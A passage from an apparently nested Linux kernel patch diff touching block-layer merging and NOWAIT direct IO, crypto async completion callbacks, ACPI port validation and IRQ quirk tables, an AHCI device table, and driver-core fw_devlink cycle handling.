+-	const blk_opf_t ff = bio->bi_opf & REQ_FAILFAST_MASK;
++	const blk_opf_t ff = bio_failfast(bio);
+ 
+ 	if (!ll_back_merge_fn(req, bio, nr_segs))
+ 		return BIO_MERGE_FAILED;
+@@ -955,6 +982,8 @@ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ 	if ((req->cmd_flags & REQ_FAILFAST_MASK) != ff)
+ 		blk_rq_set_mixed_merge(req);
+ 
++	blk_update_mixed_merge(req, bio, false);
++
+ 	req->biotail->bi_next = bio;
+ 	req->biotail = bio;
+ 	req->__data_len += bio->bi_iter.bi_size;
+@@ -968,7 +997,7 @@ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ static enum bio_merge_status bio_attempt_front_merge(struct request *req,
+ 		struct bio *bio, unsigned int nr_segs)
+ {
+-	const blk_opf_t ff = bio->bi_opf & REQ_FAILFAST_MASK;
++	const blk_opf_t ff = bio_failfast(bio);
+ 
+ 	if (!ll_front_merge_fn(req, bio, nr_segs))
+ 		return BIO_MERGE_FAILED;
+@@ -979,6 +1008,8 @@ static enum bio_merge_status bio_attempt_front_merge(struct request *req,
+ 	if ((req->cmd_flags & REQ_FAILFAST_MASK) != ff)
+ 		blk_rq_set_mixed_merge(req);
+ 
++	blk_update_mixed_merge(req, bio, true);
++
+ 	bio->bi_next = req->bio;
+ 	req->bio = bio;
+ 
+diff --git a/block/blk-mq-sched.c b/block/blk-mq-sched.c
+index a4f7c101b53b2..91fb5d1465cac 100644
+--- a/block/blk-mq-sched.c
++++ b/block/blk-mq-sched.c
+@@ -19,8 +19,7 @@
+ #include "blk-wbt.h"
+ 
+ /*
+- * Mark a hardware queue as needing a restart. For shared queues, maintain
+- * a count of how many hardware queues are marked for restart.
++ * Mark a hardware queue as needing a restart.
+  */
+ void blk_mq_sched_mark_restart_hctx(struct blk_mq_hw_ctx *hctx)
+ {
+@@ -82,7 +81,7 @@ dispatch:
+ /*
+  * Only SCSI implements .get_budget and .put_budget, and SCSI restarts
+  * its queue by itself in its completion handler, so we don't need to
+- * restart queue if .get_budget() returns BLK_STS_NO_RESOURCE.
++ * restart queue if .get_budget() fails to get the budget.
+  *
+  * Returns -EAGAIN if hctx->dispatch was found non-empty and run_work has to
+  * be run again.  This is necessary to avoid starving flushes.
+@@ -210,7 +209,7 @@ static struct blk_mq_ctx *blk_mq_next_ctx(struct blk_mq_hw_ctx *hctx,
+ /*
+  * Only SCSI implements .get_budget and .put_budget, and SCSI restarts
+  * its queue by itself in its completion handler, so we don't need to
+- * restart queue if .get_budget() returns BLK_STS_NO_RESOURCE.
++ * restart queue if .get_budget() fails to get the budget.
+  *
+  * Returns -EAGAIN if hctx->dispatch was found non-empty and run_work has to
+  * be run again.  This is necessary to avoid starving flushes.
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 83fbc7c546172..fe0a3a882f465 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -626,7 +626,8 @@ struct request *blk_mq_alloc_request_hctx(struct request_queue *q,
+ 	 * allocator for this for the rare use case of a command tied to
+ 	 * a specific queue.
+ 	 */
+-	if (WARN_ON_ONCE(!(flags & (BLK_MQ_REQ_NOWAIT | BLK_MQ_REQ_RESERVED))))
++	if (WARN_ON_ONCE(!(flags & BLK_MQ_REQ_NOWAIT)) ||
++	    WARN_ON_ONCE(!(flags & BLK_MQ_REQ_RESERVED)))
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	if (hctx_idx >= q->nr_hw_queues)
+@@ -1793,12 +1794,13 @@ static int blk_mq_dispatch_wake(wait_queue_entry_t *wait, unsigned mode,
+ static bool blk_mq_mark_tag_wait(struct blk_mq_hw_ctx *hctx,
+ 				 struct request *rq)
+ {
+-	struct sbitmap_queue *sbq = &hctx->tags->bitmap_tags;
++	struct sbitmap_queue *sbq;
+ 	struct wait_queue_head *wq;
+ 	wait_queue_entry_t *wait;
+ 	bool ret;
+ 
+-	if (!(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED)) {
++	if (!(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED) &&
++	    !(blk_mq_is_shared_tags(hctx->flags))) {
+ 		blk_mq_sched_mark_restart_hctx(hctx);
+ 
+ 		/*
+@@ -1816,6 +1818,10 @@ static bool blk_mq_mark_tag_wait(struct blk_mq_hw_ctx *hctx,
+ 	if (!list_empty_careful(&wait->entry))
+ 		return false;
+ 
++	if (blk_mq_tag_is_reserved(rq->mq_hctx->sched_tags, rq->internal_tag))
++		sbq = &hctx->tags->breserved_tags;
++	else
++		sbq = &hctx->tags->bitmap_tags;
+ 	wq = &bt_wait_ptr(sbq, hctx)->wait;
+ 
+ 	spin_lock_irq(&wq->lock);
+@@ -2064,7 +2070,8 @@ out:
+ 		bool needs_restart;
+ 		/* For non-shared tags, the RESTART check will suffice */
+ 		bool no_tag = prep == PREP_DISPATCH_NO_TAG &&
+-			(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED);
++			((hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED) ||
++			blk_mq_is_shared_tags(hctx->flags));
+ 
+ 		if (nr_budgets)
+ 			blk_mq_release_budgets(q, list);
+diff --git a/block/fops.c b/block/fops.c
+index b90742595317e..e406aa605327e 100644
+--- a/block/fops.c
++++ b/block/fops.c
+@@ -221,6 +221,24 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
+ 			bio_endio(bio);
+ 			break;
+ 		}
++		if (iocb->ki_flags & IOCB_NOWAIT) {
++			/*
++			 * This is nonblocking IO, and we need to allocate
++			 * another bio if we have data left to map. As we
++			 * cannot guarantee that one of the sub bios will not
++			 * fail getting issued FOR NOWAIT and as error results
++			 * are coalesced across all of them, be safe and ask for
++			 * a retry of this from blocking context.
++			 */
++			if (unlikely(iov_iter_count(iter))) {
++				bio_release_pages(bio, false);
++				bio_clear_flag(bio, BIO_REFFED);
++				bio_put(bio);
++				blk_finish_plug(&plug);
++				return -EAGAIN;
++			}
++			bio->bi_opf |= REQ_NOWAIT;
++		}
+ 
+ 		if (is_read) {
+ 			if (dio->flags & DIO_SHOULD_DIRTY)
+@@ -228,9 +246,6 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
+ 		} else {
+ 			task_io_account_write(bio->bi_iter.bi_size);
+ 		}
+-		if (iocb->ki_flags & IOCB_NOWAIT)
+-			bio->bi_opf |= REQ_NOWAIT;
+-
+ 		dio->size += bio->bi_iter.bi_size;
+ 		pos += bio->bi_iter.bi_size;
+ 
+diff --git a/crypto/asymmetric_keys/public_key.c b/crypto/asymmetric_keys/public_key.c
+index 2f8352e888602..eca5671ad3f22 100644
+--- a/crypto/asymmetric_keys/public_key.c
++++ b/crypto/asymmetric_keys/public_key.c
+@@ -186,8 +186,28 @@ static int software_key_query(const struct kernel_pkey_params *params,
+ 
+ 	len = crypto_akcipher_maxsize(tfm);
+ 	info->key_size = len * 8;
+-	info->max_data_size = len;
+-	info->max_sig_size = len;
++
++	if (strncmp(pkey->pkey_algo, "ecdsa", 5) == 0) {
++		/*
++		 * ECDSA key sizes are much smaller than RSA, and thus could
++		 * operate on (hashed) inputs that are larger than key size.
++		 * For example SHA384-hashed input used with secp256r1
++		 * based keys.  Set max_data_size to be at least as large as
++		 * the largest supported hash size (SHA512)
++		 */
++		info->max_data_size = 64;
++
++		/*
++		 * Verify takes ECDSA-Sig (described in RFC 5480) as input,
++		 * which is actually 2 'key_size'-bit integers encoded in
++		 * ASN.1.  Account for the ASN.1 encoding overhead here.
++		 */
++		info->max_sig_size = 2 * (len + 3) + 2;
++	} else {
++		info->max_data_size = len;
++		info->max_sig_size = len;
++	}
++
+ 	info->max_enc_size = len;
+ 	info->max_dec_size = len;
+ 	info->supported_ops = (KEYCTL_SUPPORTS_ENCRYPT |
+diff --git a/crypto/essiv.c b/crypto/essiv.c
+index e33369df90344..307eba74b901e 100644
+--- a/crypto/essiv.c
++++ b/crypto/essiv.c
+@@ -171,7 +171,12 @@ static void essiv_aead_done(struct crypto_async_request *areq, int err)
+ 	struct aead_request *req = areq->data;
+ 	struct essiv_aead_request_ctx *rctx = aead_request_ctx(req);
+ 
++	if (err == -EINPROGRESS)
++		goto out;
++
+ 	kfree(rctx->assoc);
++
++out:
+ 	aead_request_complete(req, err);
+ }
+ 
+@@ -247,7 +252,7 @@ static int essiv_aead_crypt(struct aead_request *req, bool enc)
+ 	err = enc ? crypto_aead_encrypt(subreq) :
+ 		    crypto_aead_decrypt(subreq);
+ 
+-	if (rctx->assoc && err != -EINPROGRESS)
++	if (rctx->assoc && err != -EINPROGRESS && err != -EBUSY)
+ 		kfree(rctx->assoc);
+ 	return err;
+ }
+diff --git a/crypto/rsa-pkcs1pad.c b/crypto/rsa-pkcs1pad.c
+index 3285e3af43e14..3237b50baf3c5 100644
+--- a/crypto/rsa-pkcs1pad.c
++++ b/crypto/rsa-pkcs1pad.c
+@@ -214,16 +214,14 @@ static void pkcs1pad_encrypt_sign_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
++
++	err = pkcs1pad_encrypt_sign_complete(req, err);
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req,
+-			pkcs1pad_encrypt_sign_complete(req, err));
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ static int pkcs1pad_encrypt(struct akcipher_request *req)
+@@ -332,15 +330,14 @@ static void pkcs1pad_decrypt_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
++
++	err = pkcs1pad_decrypt_complete(req, err);
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req, pkcs1pad_decrypt_complete(req, err));
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ static int pkcs1pad_decrypt(struct akcipher_request *req)
+@@ -513,15 +510,14 @@ static void pkcs1pad_verify_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req, pkcs1pad_verify_complete(req, err));
++	err = pkcs1pad_verify_complete(req, err);
++
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ /*
+diff --git a/crypto/seqiv.c b/crypto/seqiv.c
+index 0899d527c2845..b1bcfe537daf1 100644
+--- a/crypto/seqiv.c
++++ b/crypto/seqiv.c
+@@ -23,7 +23,7 @@ static void seqiv_aead_encrypt_complete2(struct aead_request *req, int err)
+ 	struct aead_request *subreq = aead_request_ctx(req);
+ 	struct crypto_aead *geniv;
+ 
+-	if (err == -EINPROGRESS)
++	if (err == -EINPROGRESS || err == -EBUSY)
+ 		return;
+ 
+ 	if (err)
+diff --git a/crypto/xts.c b/crypto/xts.c
+index 63c85b9e64e08..de6cbcf69bbd6 100644
+--- a/crypto/xts.c
++++ b/crypto/xts.c
+@@ -203,12 +203,12 @@ static void xts_encrypt_done(struct crypto_async_request *areq, int err)
+ 	if (!err) {
+ 		struct xts_request_ctx *rctx = skcipher_request_ctx(req);
+ 
+-		rctx->subreq.base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
++		rctx->subreq.base.flags &= CRYPTO_TFM_REQ_MAY_BACKLOG;
+ 		err = xts_xor_tweak_post(req, true);
+ 
+ 		if (!err && unlikely(req->cryptlen % XTS_BLOCK_SIZE)) {
+ 			err = xts_cts_final(req, crypto_skcipher_encrypt);
+-			if (err == -EINPROGRESS)
++			if (err == -EINPROGRESS || err == -EBUSY)
+ 				return;
+ 		}
+ 	}
+@@ -223,12 +223,12 @@ static void xts_decrypt_done(struct crypto_async_request *areq, int err)
+ 	if (!err) {
+ 		struct xts_request_ctx *rctx = skcipher_request_ctx(req);
+ 
+-		rctx->subreq.base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
++		rctx->subreq.base.flags &= CRYPTO_TFM_REQ_MAY_BACKLOG;
+ 		err = xts_xor_tweak_post(req, false);
+ 
+ 		if (!err && unlikely(req->cryptlen % XTS_BLOCK_SIZE)) {
+ 			err = xts_cts_final(req, crypto_skcipher_decrypt);
+-			if (err == -EINPROGRESS)
++			if (err == -EINPROGRESS || err == -EBUSY)
+ 				return;
+ 		}
+ 	}
+diff --git a/drivers/acpi/acpica/Makefile b/drivers/acpi/acpica/Makefile
+index 59700433a96e5..f919811156b1f 100644
+--- a/drivers/acpi/acpica/Makefile
++++ b/drivers/acpi/acpica/Makefile
+@@ -3,7 +3,7 @@
+ # Makefile for ACPICA Core interpreter
+ #
+ 
+-ccflags-y			:= -Os -D_LINUX -DBUILDING_ACPICA
++ccflags-y			:= -D_LINUX -DBUILDING_ACPICA
+ ccflags-$(CONFIG_ACPI_DEBUG)	+= -DACPI_DEBUG_OUTPUT
+ 
+ # use acpi.o to put all files here into acpi.o modparam namespace
+diff --git a/drivers/acpi/acpica/hwvalid.c b/drivers/acpi/acpica/hwvalid.c
+index 915b26448d2c9..0d392e7b0747b 100644
+--- a/drivers/acpi/acpica/hwvalid.c
++++ b/drivers/acpi/acpica/hwvalid.c
+@@ -23,8 +23,8 @@ acpi_hw_validate_io_request(acpi_io_address address, u32 bit_width);
+  *
+  * The table is used to implement the Microsoft port access rules that
+  * first appeared in Windows XP. Some ports are always illegal, and some
+- * ports are only illegal if the BIOS calls _OSI with a win_XP string or
+- * later (meaning that the BIOS itelf is post-XP.)
++ * ports are only illegal if the BIOS calls _OSI with nothing newer than
++ * the specific _OSI strings.
+  *
+  * This provides ACPICA with the desired port protections and
+  * Microsoft compatibility.
+@@ -145,7 +145,8 @@ acpi_hw_validate_io_request(acpi_io_address address, u32 bit_width)
+ 
+ 			/* Port illegality may depend on the _OSI calls made by the BIOS */
+ 
+-			if (acpi_gbl_osi_data >= port_info->osi_dependency) {
++			if (port_info->osi_dependency == ACPI_ALWAYS_ILLEGAL ||
++			    acpi_gbl_osi_data == port_info->osi_dependency) {
+ 				ACPI_DEBUG_PRINT((ACPI_DB_VALUES,
+ 						  "Denied AML access to port 0x%8.8X%8.8X/%X (%s 0x%.4X-0x%.4X)\n",
+ 						  ACPI_FORMAT_UINT64(address),
+diff --git a/drivers/acpi/acpica/nsrepair.c b/drivers/acpi/acpica/nsrepair.c
+index 367fcd201f96e..ec512e06a48ed 100644
+--- a/drivers/acpi/acpica/nsrepair.c
++++ b/drivers/acpi/acpica/nsrepair.c
+@@ -181,8 +181,9 @@ acpi_ns_simple_repair(struct acpi_evaluate_info *info,
+ 	 * Try to fix if there was no return object. Warning if failed to fix.
+ 	 */
+ 	if (!return_object) {
+-		if (expected_btypes && (!(expected_btypes & ACPI_RTYPE_NONE))) {
+-			if (package_index != ACPI_NOT_PACKAGE_ELEMENT) {
++		if (expected_btypes) {
++			if (!(expected_btypes & ACPI_RTYPE_NONE) &&
++			    package_index != ACPI_NOT_PACKAGE_ELEMENT) {
+ 				ACPI_WARN_PREDEFINED((AE_INFO,
+ 						      info->full_pathname,
+ 						      ACPI_WARN_ALWAYS,
+@@ -196,14 +197,15 @@ acpi_ns_simple_repair(struct acpi_evaluate_info *info,
+ 				if (ACPI_SUCCESS(status)) {
+ 					return (AE_OK);	/* Repair was successful */
+ 				}
+-			} else {
++			}
++
++			if (expected_btypes != ACPI_RTYPE_NONE) {
+ 				ACPI_WARN_PREDEFINED((AE_INFO,
+ 						      info->full_pathname,
+ 						      ACPI_WARN_ALWAYS,
+ 						      "Missing expected return value"));
++				return (AE_AML_NO_RETURN_VALUE);
+ 			}
+-
+-			return (AE_AML_NO_RETURN_VALUE);
+ 		}
+ 	}
+ 
+diff --git a/drivers/acpi/battery.c b/drivers/acpi/battery.c
+index 306513fec1e1f..084f156bdfbc4 100644
+--- a/drivers/acpi/battery.c
++++ b/drivers/acpi/battery.c
+@@ -440,7 +440,7 @@ static int extract_package(struct acpi_battery *battery,
+ 
+ 			if (element->type == ACPI_TYPE_STRING ||
+ 			    element->type == ACPI_TYPE_BUFFER)
+-				strncpy(ptr, element->string.pointer, 32);
++				strscpy(ptr, element->string.pointer, 32);
+ 			else if (element->type == ACPI_TYPE_INTEGER) {
+ 				strncpy(ptr, (u8 *)&element->integer.value,
+ 					sizeof(u64));
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index 192d1784e409b..a222bda7e15b0 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -467,17 +467,34 @@ static const struct dmi_system_id lenovo_laptop[] = {
+ 	{ }
+ };
+ 
+-static const struct dmi_system_id schenker_gm_rg[] = {
++static const struct dmi_system_id tongfang_gm_rg[] = {
+ 	{
+-		.ident = "XMG CORE 15 (M22)",
++		.ident = "TongFang GMxRGxx/XMG CORE 15 (M22)/TUXEDO Stellaris 15 Gen4 AMD",
+ 		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "SchenkerTechnologiesGmbH"),
+ 			DMI_MATCH(DMI_BOARD_NAME, "GMxRGxx"),
+ 		},
+ 	},
+ 	{ }
+ };
+ 
++static const struct dmi_system_id maingear_laptop[] = {
++	{
++		.ident = "MAINGEAR Vector Pro 2 15",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Micro Electronics Inc"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "MG-VCP2-15A3070T"),
++		}
++	},
++	{
++		.ident = "MAINGEAR Vector Pro 2 17",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Micro Electronics Inc"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "MG-VCP2-17A3070T"),
++		},
++	},
++	{ }
++};
++
+ struct irq_override_cmp {
+ 	const struct dmi_system_id *system;
+ 	unsigned char irq;
+@@ -492,7 +509,8 @@ static const struct irq_override_cmp override_table[] = {
+ 	{ asus_laptop, 1, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, false },
+ 	{ lenovo_laptop, 6, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+ 	{ lenovo_laptop, 10, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+-	{ schenker_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
++	{ tongfang_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
++	{ maingear_laptop, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
+ };
+ 
+ static bool acpi_dev_irq_override(u32 gsi, u8 triggering, u8 polarity,
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index b48f85c3791e9..7f0ed845cd6ad 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -432,7 +432,7 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 	 /* Lenovo Ideapad Z570 */
+ 	 .matches = {
+ 		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "102434U"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "Ideapad Z570"),
+ 		},
+ 	},
+ 	{
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 17bb0d8158ca0..53ab2306da009 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -422,7 +422,6 @@ static const struct pci_device_id ahci_pci_tbl[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x34d3), board_ahci_low_power }, /* Ice Lake LP AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d3), board_ahci_low_power }, /* Comet Lake PCH-U AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d7), board_ahci_low_power }, /* Comet Lake PCH RAID */
+-	{ PCI_VDEVICE(INTEL, 0xa0d3), board_ahci_low_power }, /* Tiger Lake UP{3,4} AHCI */
+ 
+ 	/* JMicron 360/1/3/5/6, match class to avoid IDE function */
+ 	{ PCI_VENDOR_ID_JMICRON, PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID,
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index d02501933467d..e30223c2672fc 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -53,11 +53,12 @@ static LIST_HEAD(deferred_sync);
+ static unsigned int defer_sync_state_count = 1;
+ static DEFINE_MUTEX(fwnode_link_lock);
+ static bool fw_devlink_is_permissive(void);
++static void __fw_devlink_link_to_consumers(struct device *dev);
+ static bool fw_devlink_drv_reg_done;
+ static bool fw_devlink_best_effort;
+ 
+ /**
+- * fwnode_link_add - Create a link between two fwnode_handles.
++ * __fwnode_link_add - Create a link between two fwnode_handles.
+  * @con: Consumer end of the link.
+  * @sup: Supplier end of the link.
+  *
+@@ -73,35 +74,42 @@ static bool fw_devlink_best_effort;
+  * Attempts to create duplicate links between the same pair of fwnode handles
+  * are ignored and there is no reference counting.
+  */
+-int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup)
++static int __fwnode_link_add(struct fwnode_handle *con,
++			     struct fwnode_handle *sup, u8 flags)
+ {
+ 	struct fwnode_link *link;
+-	int ret = 0;
+-
+-	mutex_lock(&fwnode_link_lock);
+ 
+ 	list_for_each_entry(link, &sup->consumers, s_hook)
+-		if (link->consumer == con)
+-			goto out;
++		if (link->consumer == con) {
++			link->flags |= flags;
++			return 0;
++		}
+ 
+ 	link = kzalloc(sizeof(*link), GFP_KERNEL);
+-	if (!link) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
++	if (!link)
++		return -ENOMEM;
+ 
+ 	link->supplier = sup;
+ 	INIT_LIST_HEAD(&link->s_hook);
+ 	link->consumer = con;
+ 	INIT_LIST_HEAD(&link->c_hook);
++	link->flags = flags;
+ 
+ 	list_add(&link->s_hook, &sup->consumers);
+ 	list_add(&link->c_hook, &con->suppliers);
+ 	pr_debug("%pfwP Linked as a fwnode consumer to %pfwP\n",
+ 		 con, sup);
+-out:
+-	mutex_unlock(&fwnode_link_lock);
+ 
++	return 0;
++}
++
++int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup)
++{
++	int ret;
++
++	mutex_lock(&fwnode_link_lock);
++	ret = __fwnode_link_add(con, sup, 0);
++	mutex_unlock(&fwnode_link_lock);
+ 	return ret;
+ }
+ 
+@@ -120,6 +128,19 @@ static void __fwnode_link_del(struct fwnode_link *link)
+ 	kfree(link);
+ }
+ 
++/**
++ * __fwnode_link_cycle - Mark a fwnode link as being part of a cycle.
++ * @link: the fwnode_link to be marked
++ *
++ * The fwnode_link_lock needs to be held when this function is called.
++ */
++static void __fwnode_link_cycle(struct fwnode_link *link)
++{
++	pr_debug("%pfwf: Relaxing link with %pfwf\n",
++		 link->consumer, link->supplier);
++	link->flags |= FWLINK_FLAG_CYCLE;
++}
++
+ /**
+  * fwnode_links_purge_suppliers - Delete all supplier links of fwnode_handle.
+  * @fwnode: fwnode whose supplier links need to be deleted
+@@ -180,6 +201,51 @@ void fw_devlink_purge_absent_suppliers(struct fwnode_handle *fwnode)
+ }
+ EXPORT_SYMBOL_GPL(fw_devlink_purge_absent_suppliers);
+ 
++/**
++ * __fwnode_links_move_consumers - Move consumer from @from to @to fwnode_handle
++ * @from: move consumers away from this fwnode
++ * @to: move consumers to this fwnode
++ *
++ * Move all consumer links from @from fwnode to @to fwnode.
++ */
++static void __fwnode_links_move_consumers(struct fwnode_handle *from,
++					  struct fwnode_handle *to)
++{
++	struct fwnode_link *link, *tmp;
++
++	list_for_each_entry_safe(link, tmp, &from->consumers, s_hook) {
++		__fwnode_link_add(link->consumer, to, link->flags);
++		__fwnode_link_del(link);
++	}
++}
++
++/**
++ * __fw_devlink_pickup_dangling_consumers - Pick up dangling consumers
++ * @fwnode: fwnode from which to pick up dangling consumers
++ * @new_sup: fwnode of new supplier
++ *
++ * If the @fwnode has a corresponding struct device and the device supports
++ * probing (that is, added to a bus), then we want to let fw_devlink create
++ * MANAGED device links to this device, so leave @fwnode and its descendant's
++ * fwnode links alone.
++ *
++ * Otherwise, move its consumers to the new supplier @new_sup.
++ */
++static void __fw_devlink_pickup_dangling_consumers(struct fwnode_handle *fwnode,
++						   struct fwnode_handle *new_sup)
++{
++	struct fwnode_handle *child;
++
++	if (fwnode->dev && fwnode->dev->bus)
++		return;
++
++	fwnode->flags |= FWNODE_FLAG_NOT_DEVICE;
++	__fwnode_links_move_consumers(fwnode, new_sup);
++
++	fwnode_for_each_available_child_node(fwnode, child)
++		__fw_devlink_pickup_dangling_consumers(child, new_sup);
++}
++
+ #ifdef CONFIG_SRCU
+ static DEFINE_MUTEX(device_links_lock);
+ DEFINE_STATIC_SRCU(device_links_srcu);
+@@ -271,6 +337,12 @@ static bool device_is_ancestor(struct device *dev, struct device *target)
+ 	return false;
+ }
+ 
++static inline bool device_link_flag_is_sync_state_only(u32 flags)
++{
++	return (flags & ~(DL_FLAG_INFERRED | DL_FLAG_CYCLE)) ==
++		(DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED);
++}
++
+ /**
+  * device_is_dependent - Check if one device depends on another one
+  * @dev: Device to check dependencies for.
+@@ -297,8 +369,7 @@ int device_is_dependent(struct device *dev, void *target)
+ 		return ret;
+ 
+ 	list_for_each_entry(link, &dev->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
++		if (device_link_flag_is_sync_state_only(link->flags))
+ 			continue;
+ 
+ 		if (link->consumer == target)
+@@ -371,8 +442,7 @@ static int device_reorder_to_tail(struct device *dev, void *not_used)
+ 
+ 	device_for_each_child(dev, NULL, device_reorder_to_tail);
+ 	list_for_each_entry(link, &dev->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
++		if (device_link_flag_is_sync_state_only(link->flags))
+ 			continue;
+ 		device_reorder_to_tail(link->consumer, NULL);
+ 	}
+@@ -633,7 +703,8 @@ postcore_initcall(devlink_class_init);
+ 			       DL_FLAG_AUTOREMOVE_SUPPLIER | \
+ 			       DL_FLAG_AUTOPROBE_CONSUMER  | \
+ 			       DL_FLAG_SYNC_STATE_ONLY | \
+-			       DL_FLAG_INFERRED)
++			       DL_FLAG_INFERRED | \
++			       DL_FLAG_CYCLE)
+ 
+ #define DL_ADD_VALID_FLAGS (DL_MANAGED_LINK_FLAGS | DL_FLAG_STATELESS | \
+ 			    DL_FLAG_PM_RUNTIME | DL_FLAG_RPM_ACTIVE)
+@@ -702,8 +773,6 @@ struct device_link *device_link_add(struct device *consumer,
+ 	if (!consumer || !supplier || consumer == supplier ||
+ 	    flags & ~DL_ADD_VALID_FLAGS ||
+ 	    (flags & DL_FLAG_STATELESS && flags & DL_MANAGED_LINK_FLAGS) ||
+-	    (flags & DL_FLAG_SYNC_STATE_ONLY &&
+-	     (flags & ~DL_FLAG_INFERRED) != DL_FLAG_SYNC_STATE_ONLY) ||
+ 	    (flags & DL_FLAG_AUTOPROBE_CONSUMER &&
+ 	     flags & (DL_FLAG_AUTOREMOVE_CONSUMER |
+ 		      DL_FLAG_AUTOREMOVE_SUPPLIER)))
+@@ -719,6 +788,10 @@ struct device_link *device_link_add(struct device *consumer,
+ 	if (!(flags & DL_FLAG_STATELESS))
+ 		flags |= DL_FLAG_MANAGED;
+ 
++	if (flags & DL_FLAG_SYNC_STATE_ONLY &&
++	    !device_link_flag_is_sync_state_only(flags))
++		return NULL;
++
+ 	device_links_write_lock();
+ 	device_pm_lock();
+ 
+@@ -983,6 +1056,21 @@ static bool dev_is_best_effort(struct device *dev)
+ 		(dev->fwnode && (dev->fwnode->flags & FWNODE_FLAG_BEST_EFFORT));
+ }
+ 
++static struct fwnode_handle *fwnode_links_check_suppliers(
++						struct fwnode_handle *fwnode)
++{
++	struct fwnode_link *link;
++
++	if (!fwnode || fw_devlink_is_permissive())
++		return NULL;
++
++	list_for_each_entry(link, &fwnode->suppliers, c_hook)
++		if (!(link->flags & FWLINK_FLAG_CYCLE))
++			return link->supplier;
++
++	return NULL;
++}
++
+ /**
+  * device_links_check_suppliers - Check presence of supplier drivers.
+  * @dev: Consumer device.
+@@ -1010,11 +1098,8 @@ int device_links_check_suppliers(struct device *dev)
+ 	 * probe.
+ 	 */
+ 	mutex_lock(&fwnode_link_lock);
+-	if (dev->fwnode && !list_empty(&dev->fwnode->suppliers) &&
+-	    !fw_devlink_is_permissive()) {
+-		sup_fw = list_first_entry(&dev->fwnode->suppliers,
+-					  struct fwnode_link,
+-					  c_hook)->supplier;
++	sup_fw = fwnode_links_check_suppliers(dev->fwnode);
++	if (sup_fw) {
+ 		if (!dev_is_best_effort(dev)) {
+ 			fwnode_ret = -EPROBE_DEFER;
+ 			dev_err_probe(dev, -EPROBE_DEFER,
+@@ -1203,7 +1288,9 @@ static ssize_t waiting_for_supplier_show(struct device *dev,
+ 	bool val;
